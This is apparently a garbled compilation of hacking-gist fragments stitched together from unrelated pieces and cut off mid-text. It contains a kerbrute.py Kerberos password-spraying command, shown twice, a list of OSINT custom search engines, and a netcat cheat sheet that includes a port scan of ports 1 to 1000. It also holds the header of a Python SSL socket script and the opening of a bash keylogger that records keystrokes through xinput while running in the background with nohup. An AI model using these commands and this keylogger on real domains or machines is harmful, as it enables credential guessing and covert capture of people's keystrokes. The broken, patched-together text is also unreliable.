With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| [ | |
| { | |
| "label": "GEOSINTsearch", | |
| "description": "Searches within posts from Twitter, Reddit and 4Chan and presents anything that contains a Google Maps link", | |
| "value": "https://cse.google.com/cse?cx=015328649639895072395:sbv3zyxzmji" | |
| }, | |
| { | |
| "label": "Pasted tekst", | |
| "description": "Look if any specifc text has been posted before", | |
| "value": "https://cse.google.com/cse/publicurl?cx=013991603413798772546:nxs552dhq8k" |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| ---------------------------------------------------------------------------------------------------- | |
| (netcat or nc or ncat) | |
| #Use Netcat as a Simple Web Server | |
| vi index.html #make a simple HTML file | |
| printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888 # | |
| http://server_IP:8888 #access the content,serve the page, and then the netcat connection will close | |
| "while true; do printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888; done" #have netcat serve the page indefinitely by wrapping the last command in an infinite loop | |
| netcat -z -v domain.com 1-1000 #scan all ports up to 1000 |
| #!/usr/bin/python | |
| # -*- coding: utf-8 -*- | |
| import ssl | |
| import socket | |
| import os | |
| import sys | |
| from argparse import ArgumentParser | |
| from argparse import RawTextHelpFormatter | |
| from threading import Thread |
| #!/bin/bash | |
| # you'll have to get your keyboard id from xinput --list | |
| # then start it like nohup ./keyboard.sh & and write down the pid | |
| # shown. When you're done, just kill $pid and it will print the recorded | |
| # keystrokes | |
| handler(){ | |
| killall -9 xinput | |
| while read line; do | |
| sed "s|$line|${mapa[$line]}|" <<< $line |